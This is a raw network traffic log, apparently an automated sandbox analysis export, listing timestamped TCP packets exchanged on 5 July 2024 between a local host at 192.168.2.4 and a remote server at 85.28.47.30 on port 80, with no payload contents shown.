                                                                Jul 5, 2024 04:36:05.323565960 CEST4973080192.168.2.485.28.47.30
                                                                Jul 5, 2024 04:36:05.323739052 CEST804973085.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:36:05.323750973 CEST804973085.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:36:05.323762894 CEST804973085.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:36:05.323787928 CEST4973080192.168.2.485.28.47.30
                                                                Jul 5, 2024 04:36:05.323813915 CEST4973080192.168.2.485.28.47.30
                                                                Jul 5, 2024 04:36:05.323829889 CEST804973085.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:36:05.323842049 CEST804973085.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:36:05.323852062 CEST804973085.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:36:05.323863983 CEST804973085.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:36:05.323873997 CEST4973080192.168.2.485.28.47.30
                                                                Jul 5, 2024 04:36:05.323904991 CEST4973080192.168.2.485.28.47.30
                                                                Jul 5, 2024 04:36:05.324071884 CEST804973085.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:36:05.324084044 CEST804973085.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:36:05.324094057 CEST804973085.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:36:05.324106932 CEST804973085.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:36:05.324115992 CEST4973080192.168.2.485.28.47.30
                                                                Jul 5, 2024 04:36:05.324120045 CEST804973085.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:36:05.324127913 CEST4973080192.168.2.485.28.47.30
                                                                Jul 5, 2024 04:36:05.324131966 CEST804973085.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:36:05.324143887 CEST804973085.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:36:05.324155092 CEST804973085.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:36:05.324160099 CEST4973080192.168.2.485.28.47.30
                                                                Jul 5, 2024 04:36:05.324168921 CEST804973085.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:36:05.324187994 CEST4973080192.168.2.485.28.47.30
                                                                Jul 5, 2024 04:36:05.324196100 CEST4973080192.168.2.485.28.47.30
                                                                Jul 5, 2024 04:36:05.324204922 CEST804973085.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:36:05.324215889 CEST804973085.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:36:05.324223995 CEST4973080192.168.2.485.28.47.30
                                                                Jul 5, 2024 04:36:05.324224949 CEST804973085.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:36:05.324238062 CEST804973085.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:36:05.324244976 CEST4973080192.168.2.485.28.47.30
                                                                Jul 5, 2024 04:36:05.324259043 CEST4973080192.168.2.485.28.47.30
                                                                Jul 5, 2024 04:36:05.324270964 CEST4973080192.168.2.485.28.47.30
                                                                Jul 5, 2024 04:36:05.324417114 CEST804973085.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:36:05.324428082 CEST804973085.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:36:05.324438095 CEST804973085.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:36:05.324449062 CEST804973085.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:36:05.324457884 CEST804973085.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:36:05.324460030 CEST4973080192.168.2.485.28.47.30
                                                                Jul 5, 2024 04:36:05.324471951 CEST804973085.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:36:05.324489117 CEST804973085.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:36:05.324490070 CEST4973080192.168.2.485.28.47.30
                                                                Jul 5, 2024 04:36:05.324501038 CEST4973080192.168.2.485.28.47.30
                                                                Jul 5, 2024 04:36:05.324505091 CEST804973085.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:36:05.324532032 CEST4973080192.168.2.485.28.47.30
                                                                Jul 5, 2024 04:36:05.324551105 CEST4973080192.168.2.485.28.47.30
                                                                Jul 5, 2024 04:36:05.324693918 CEST804973085.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:36:05.324704885 CEST804973085.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:36:05.324714899 CEST804973085.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:36:05.324737072 CEST4973080192.168.2.485.28.47.30
                                                                Jul 5, 2024 04:36:05.324754953 CEST4973080192.168.2.485.28.47.30
                                                                Jul 5, 2024 04:36:05.324805021 CEST804973085.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:36:05.324815989 CEST804973085.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:36:05.324826002 CEST804973085.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:36:05.324837923 CEST804973085.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:36:05.324847937 CEST4973080192.168.2.485.28.47.30
                                                                Jul 5, 2024 04:36:05.324872971 CEST4973080192.168.2.485.28.47.30
                                                                Jul 5, 2024 04:36:05.324879885 CEST4973080192.168.2.485.28.47.30
                                                                Jul 5, 2024 04:36:05.324949980 CEST804973085.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:36:05.324961901 CEST804973085.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:36:05.324970961 CEST804973085.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:36:05.324981928 CEST804973085.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:36:05.324994087 CEST804973085.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:36:05.325005054 CEST804973085.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:36:05.325011969 CEST4973080192.168.2.485.28.47.30
                                                                Jul 5, 2024 04:36:05.325016022 CEST804973085.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:36:05.325026035 CEST804973085.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:36:05.325031042 CEST4973080192.168.2.485.28.47.30
                                                                Jul 5, 2024 04:36:05.325037003 CEST804973085.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:36:05.325056076 CEST4973080192.168.2.485.28.47.30
                                                                Jul 5, 2024 04:36:05.325071096 CEST4973080192.168.2.485.28.47.30
                                                                Jul 5, 2024 04:36:05.413258076 CEST804973085.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:36:05.413269043 CEST804973085.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:36:05.413274050 CEST804973085.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:36:05.413316011 CEST804973085.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:36:05.413326025 CEST804973085.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:36:05.413331032 CEST4973080192.168.2.485.28.47.30
                                                                Jul 5, 2024 04:36:05.413336992 CEST804973085.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:36:05.413348913 CEST804973085.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:36:05.413358927 CEST804973085.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:36:05.413367987 CEST4973080192.168.2.485.28.47.30
                                                                Jul 5, 2024 04:36:05.413388014 CEST4973080192.168.2.485.28.47.30
                                                                Jul 5, 2024 04:36:05.413398027 CEST4973080192.168.2.485.28.47.30
                                                                Jul 5, 2024 04:36:05.413440943 CEST804973085.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:36:05.413450003 CEST804973085.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:36:05.413456917 CEST804973085.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:36:05.413469076 CEST804973085.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:36:05.413479090 CEST804973085.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:36:05.413487911 CEST804973085.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:36:05.413491964 CEST4973080192.168.2.485.28.47.30
                                                                Jul 5, 2024 04:36:05.413505077 CEST804973085.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:36:05.413517952 CEST804973085.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:36:05.413517952 CEST4973080192.168.2.485.28.47.30
                                                                Jul 5, 2024 04:36:05.413535118 CEST4973080192.168.2.485.28.47.30
                                                                Jul 5, 2024 04:36:05.413558960 CEST4973080192.168.2.485.28.47.30
                                                                Jul 5, 2024 04:36:05.413559914 CEST804973085.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:36:05.413569927 CEST804973085.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:36:05.413578987 CEST804973085.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:36:05.413589954 CEST804973085.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:36:05.413602114 CEST4973080192.168.2.485.28.47.30
                                                                Jul 5, 2024 04:36:05.413604975 CEST804973085.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:36:05.413614988 CEST4973080192.168.2.485.28.47.30
                                                                Jul 5, 2024 04:36:05.413615942 CEST804973085.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:36:05.413630009 CEST804973085.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:36:05.413642883 CEST4973080192.168.2.485.28.47.30
                                                                Jul 5, 2024 04:36:05.413654089 CEST4973080192.168.2.485.28.47.30
                                                                Jul 5, 2024 04:36:05.413680077 CEST4973080192.168.2.485.28.47.30
                                                                Jul 5, 2024 04:36:05.413710117 CEST804973085.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:36:05.413719893 CEST804973085.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:36:05.413726091 CEST804973085.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:36:05.413734913 CEST804973085.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:36:05.413763046 CEST4973080192.168.2.485.28.47.30
                                                                Jul 5, 2024 04:36:05.413785934 CEST4973080192.168.2.485.28.47.30
                                                                Jul 5, 2024 04:36:05.413801908 CEST804973085.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:36:05.413813114 CEST804973085.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:36:05.413821936 CEST804973085.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:36:05.413837910 CEST804973085.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:36:05.413847923 CEST4973080192.168.2.485.28.47.30
                                                                Jul 5, 2024 04:36:05.413850069 CEST804973085.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:36:05.413861990 CEST804973085.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:36:05.413875103 CEST4973080192.168.2.485.28.47.30
                                                                Jul 5, 2024 04:36:05.413882971 CEST4973080192.168.2.485.28.47.30
                                                                Jul 5, 2024 04:36:05.413887024 CEST804973085.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:36:05.413908958 CEST4973080192.168.2.485.28.47.30
                                                                Jul 5, 2024 04:36:05.413924932 CEST4973080192.168.2.485.28.47.30
                                                                Jul 5, 2024 04:36:05.413937092 CEST804973085.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:36:05.413949013 CEST804973085.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:36:05.413960934 CEST804973085.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:36:05.413974047 CEST804973085.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:36:05.413983107 CEST804973085.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:36:05.413988113 CEST4973080192.168.2.485.28.47.30
                                                                Jul 5, 2024 04:36:05.414011002 CEST4973080192.168.2.485.28.47.30
                                                                Jul 5, 2024 04:36:05.414019108 CEST4973080192.168.2.485.28.47.30
                                                                Jul 5, 2024 04:36:05.414067030 CEST804973085.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:36:05.414077997 CEST804973085.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:36:05.414088964 CEST804973085.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:36:05.414104939 CEST804973085.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:36:05.414113998 CEST4973080192.168.2.485.28.47.30
                                                                Jul 5, 2024 04:36:05.414138079 CEST4973080192.168.2.485.28.47.30
                                                                Jul 5, 2024 04:36:05.414155960 CEST4973080192.168.2.485.28.47.30
                                                                Jul 5, 2024 04:36:05.414201021 CEST804973085.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:36:05.414212942 CEST804973085.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:36:05.414222002 CEST804973085.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:36:05.414232016 CEST804973085.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:36:05.414243937 CEST804973085.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:36:05.414247036 CEST4973080192.168.2.485.28.47.30
                                                                Jul 5, 2024 04:36:05.414256096 CEST804973085.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:36:05.414266109 CEST804973085.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:36:05.414273977 CEST804973085.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:36:05.414274931 CEST4973080192.168.2.485.28.47.30
                                                                Jul 5, 2024 04:36:05.414288044 CEST804973085.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:36:05.414294004 CEST4973080192.168.2.485.28.47.30
                                                                Jul 5, 2024 04:36:05.414298058 CEST804973085.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:36:05.414326906 CEST4973080192.168.2.485.28.47.30
                                                                Jul 5, 2024 04:36:05.414380074 CEST804973085.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:36:05.414391994 CEST804973085.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:36:05.414402008 CEST804973085.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:36:05.414410114 CEST4973080192.168.2.485.28.47.30
                                                                Jul 5, 2024 04:36:05.414417028 CEST804973085.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:36:05.414439917 CEST4973080192.168.2.485.28.47.30
                                                                Jul 5, 2024 04:36:05.414450884 CEST4973080192.168.2.485.28.47.30
                                                                Jul 5, 2024 04:36:05.414489985 CEST804973085.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:36:05.414501905 CEST804973085.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:36:05.414506912 CEST804973085.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:36:05.414514065 CEST804973085.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:36:05.414540052 CEST4973080192.168.2.485.28.47.30
                                                                Jul 5, 2024 04:36:05.414551973 CEST4973080192.168.2.485.28.47.30
                                                                Jul 5, 2024 04:36:05.414571047 CEST804973085.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:36:05.414582014 CEST804973085.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:36:05.414589882 CEST804973085.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:36:05.414619923 CEST804973085.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:36:05.414628983 CEST804973085.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:36:05.414633989 CEST4973080192.168.2.485.28.47.30
                                                                Jul 5, 2024 04:36:05.414642096 CEST804973085.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:36:05.414654016 CEST804973085.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:36:05.414657116 CEST4973080192.168.2.485.28.47.30
                                                                Jul 5, 2024 04:36:05.414678097 CEST4973080192.168.2.485.28.47.30
                                                                Jul 5, 2024 04:36:05.414696932 CEST804973085.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:36:05.414700031 CEST4973080192.168.2.485.28.47.30
                                                                Jul 5, 2024 04:36:05.414709091 CEST804973085.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:36:05.414743900 CEST4973080192.168.2.485.28.47.30
                                                                Jul 5, 2024 04:36:05.414774895 CEST804973085.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:36:05.414786100 CEST804973085.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:36:05.414794922 CEST804973085.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:36:05.414822102 CEST4973080192.168.2.485.28.47.30
                                                                Jul 5, 2024 04:36:05.414834976 CEST4973080192.168.2.485.28.47.30
                                                                Jul 5, 2024 04:36:05.414882898 CEST804973085.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:36:05.414892912 CEST804973085.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:36:05.414904118 CEST804973085.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:36:05.414916039 CEST804973085.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:36:05.414927006 CEST804973085.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:36:05.414931059 CEST4973080192.168.2.485.28.47.30
                                                                Jul 5, 2024 04:36:05.414940119 CEST804973085.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:36:05.414953947 CEST4973080192.168.2.485.28.47.30
                                                                Jul 5, 2024 04:36:05.414967060 CEST4973080192.168.2.485.28.47.30
                                                                Jul 5, 2024 04:36:05.414989948 CEST4973080192.168.2.485.28.47.30
                                                                Jul 5, 2024 04:36:05.415007114 CEST804973085.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:36:05.415018082 CEST804973085.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:36:05.415030956 CEST804973085.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:36:05.415041924 CEST804973085.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:36:05.415055037 CEST4973080192.168.2.485.28.47.30
                                                                Jul 5, 2024 04:36:05.415086031 CEST4973080192.168.2.485.28.47.30
                                                                Jul 5, 2024 04:36:05.415111065 CEST804973085.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:36:05.415122986 CEST804973085.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:36:05.415132046 CEST804973085.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:36:05.415158987 CEST4973080192.168.2.485.28.47.30
                                                                Jul 5, 2024 04:36:05.415170908 CEST4973080192.168.2.485.28.47.30
                                                                Jul 5, 2024 04:36:05.415189981 CEST804973085.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:36:05.415199041 CEST804973085.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:36:05.415205002 CEST804973085.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:36:05.415210009 CEST804973085.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:36:05.415237904 CEST4973080192.168.2.485.28.47.30
                                                                Jul 5, 2024 04:36:05.415255070 CEST4973080192.168.2.485.28.47.30
                                                                Jul 5, 2024 04:36:05.415263891 CEST804973085.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:36:05.415311098 CEST4973080192.168.2.485.28.47.30
                                                                Jul 5, 2024 04:36:05.415364981 CEST804973085.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:36:05.415375948 CEST804973085.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:36:05.415389061 CEST804973085.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:36:05.415401936 CEST804973085.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:36:05.415411949 CEST804973085.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:36:05.415415049 CEST4973080192.168.2.485.28.47.30
                                                                Jul 5, 2024 04:36:05.415425062 CEST804973085.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:36:05.415440083 CEST4973080192.168.2.485.28.47.30
                                                                Jul 5, 2024 04:36:05.415450096 CEST4973080192.168.2.485.28.47.30
                                                                Jul 5, 2024 04:36:05.415478945 CEST4973080192.168.2.485.28.47.30
                                                                Jul 5, 2024 04:36:05.415508032 CEST804973085.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:36:05.415519953 CEST804973085.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:36:05.415532112 CEST804973085.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:36:05.415544033 CEST804973085.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:36:05.415555954 CEST804973085.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:36:05.415556908 CEST4973080192.168.2.485.28.47.30
                                                                Jul 5, 2024 04:36:05.415568113 CEST804973085.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:36:05.415579081 CEST804973085.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:36:05.415581942 CEST4973080192.168.2.485.28.47.30
                                                                Jul 5, 2024 04:36:05.415587902 CEST804973085.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:36:05.415595055 CEST4973080192.168.2.485.28.47.30
                                                                Jul 5, 2024 04:36:05.415621996 CEST4973080192.168.2.485.28.47.30
                                                                Jul 5, 2024 04:36:05.415640116 CEST4973080192.168.2.485.28.47.30
                                                                Jul 5, 2024 04:36:05.415653944 CEST804973085.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:36:05.415666103 CEST804973085.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:36:05.415674925 CEST804973085.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:36:05.415699959 CEST4973080192.168.2.485.28.47.30
                                                                Jul 5, 2024 04:36:05.415724039 CEST4973080192.168.2.485.28.47.30
                                                                Jul 5, 2024 04:36:05.415740967 CEST804973085.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:36:05.415751934 CEST804973085.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:36:05.415760994 CEST804973085.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:36:05.415772915 CEST804973085.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:36:05.415786028 CEST4973080192.168.2.485.28.47.30
                                                                Jul 5, 2024 04:36:05.415815115 CEST4973080192.168.2.485.28.47.30
                                                                Jul 5, 2024 04:36:05.415844917 CEST804973085.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:36:05.415854931 CEST804973085.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:36:05.415891886 CEST4973080192.168.2.485.28.47.30
                                                                Jul 5, 2024 04:36:05.505017996 CEST804973085.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:36:05.505043030 CEST804973085.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:36:05.505053043 CEST804973085.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:36:05.505065918 CEST804973085.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:36:05.505084038 CEST804973085.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:36:05.505096912 CEST804973085.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:36:05.505100965 CEST4973080192.168.2.485.28.47.30
                                                                Jul 5, 2024 04:36:05.505109072 CEST804973085.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:36:05.505122900 CEST804973085.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:36:05.505135059 CEST804973085.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:36:05.505143881 CEST4973080192.168.2.485.28.47.30
                                                                Jul 5, 2024 04:36:05.505167961 CEST4973080192.168.2.485.28.47.30
                                                                Jul 5, 2024 04:36:05.505198956 CEST804973085.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:36:05.505208015 CEST804973085.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:36:05.505213022 CEST804973085.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:36:05.505218029 CEST804973085.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:36:05.505237103 CEST804973085.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:36:05.505248070 CEST804973085.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:36:05.505249977 CEST4973080192.168.2.485.28.47.30
                                                                Jul 5, 2024 04:36:05.505259037 CEST804973085.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:36:05.505264997 CEST4973080192.168.2.485.28.47.30
                                                                Jul 5, 2024 04:36:05.505295992 CEST804973085.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:36:05.505300045 CEST4973080192.168.2.485.28.47.30
                                                                Jul 5, 2024 04:36:05.505307913 CEST804973085.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:36:05.505343914 CEST4973080192.168.2.485.28.47.30
                                                                Jul 5, 2024 04:36:05.505382061 CEST804973085.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:36:05.505393028 CEST804973085.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:36:05.505402088 CEST804973085.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:36:05.505413055 CEST804973085.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:36:05.505426884 CEST804973085.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:36:05.505434036 CEST4973080192.168.2.485.28.47.30
                                                                Jul 5, 2024 04:36:05.505438089 CEST804973085.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:36:05.505451918 CEST4973080192.168.2.485.28.47.30
                                                                Jul 5, 2024 04:36:05.505462885 CEST4973080192.168.2.485.28.47.30
                                                                Jul 5, 2024 04:36:05.505466938 CEST804973085.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:36:05.505479097 CEST804973085.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:36:05.505491018 CEST4973080192.168.2.485.28.47.30
                                                                Jul 5, 2024 04:36:05.505505085 CEST4973080192.168.2.485.28.47.30
                                                                Jul 5, 2024 04:36:05.505518913 CEST804973085.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:36:05.505525112 CEST4973080192.168.2.485.28.47.30
                                                                Jul 5, 2024 04:36:05.505531073 CEST804973085.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:36:05.505541086 CEST804973085.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:36:05.505552053 CEST804973085.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:36:05.505568027 CEST4973080192.168.2.485.28.47.30
                                                                Jul 5, 2024 04:36:05.505583048 CEST804973085.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:36:05.505588055 CEST4973080192.168.2.485.28.47.30
                                                                Jul 5, 2024 04:36:05.505628109 CEST4973080192.168.2.485.28.47.30
                                                                Jul 5, 2024 04:36:05.505631924 CEST804973085.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:36:05.505644083 CEST804973085.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:36:05.505681992 CEST4973080192.168.2.485.28.47.30
                                                                Jul 5, 2024 04:36:05.505687952 CEST804973085.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:36:05.505702019 CEST804973085.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:36:05.505712032 CEST804973085.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:36:05.505723000 CEST804973085.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:36:05.505731106 CEST4973080192.168.2.485.28.47.30
                                                                Jul 5, 2024 04:36:05.505749941 CEST4973080192.168.2.485.28.47.30
                                                                Jul 5, 2024 04:36:05.505774975 CEST4973080192.168.2.485.28.47.30
                                                                Jul 5, 2024 04:36:05.505793095 CEST804973085.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:36:05.505803108 CEST804973085.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:36:05.505812883 CEST804973085.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:36:05.505825043 CEST804973085.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:36:05.505836964 CEST804973085.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:36:05.505841017 CEST4973080192.168.2.485.28.47.30
                                                                Jul 5, 2024 04:36:05.505848885 CEST804973085.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:36:05.505866051 CEST4973080192.168.2.485.28.47.30
                                                                Jul 5, 2024 04:36:05.505878925 CEST4973080192.168.2.485.28.47.30
                                                                Jul 5, 2024 04:36:05.505899906 CEST804973085.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:36:05.505908966 CEST4973080192.168.2.485.28.47.30
                                                                Jul 5, 2024 04:36:05.505912066 CEST804973085.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:36:05.505949020 CEST4973080192.168.2.485.28.47.30
                                                                Jul 5, 2024 04:36:05.505987883 CEST804973085.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:36:05.505996943 CEST804973085.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:36:05.506006956 CEST804973085.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:36:05.506021976 CEST804973085.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:36:05.506033897 CEST4973080192.168.2.485.28.47.30
                                                                Jul 5, 2024 04:36:05.506046057 CEST4973080192.168.2.485.28.47.30
                                                                Jul 5, 2024 04:36:05.506069899 CEST4973080192.168.2.485.28.47.30
                                                                Jul 5, 2024 04:36:05.506139040 CEST804973085.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:36:05.506150007 CEST804973085.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:36:05.506159067 CEST804973085.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:36:05.506170034 CEST804973085.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:36:05.506180048 CEST804973085.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:36:05.506190062 CEST804973085.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:36:05.506196976 CEST4973080192.168.2.485.28.47.30
                                                                Jul 5, 2024 04:36:05.506201982 CEST804973085.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:36:05.506213903 CEST804973085.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:36:05.506217003 CEST4973080192.168.2.485.28.47.30
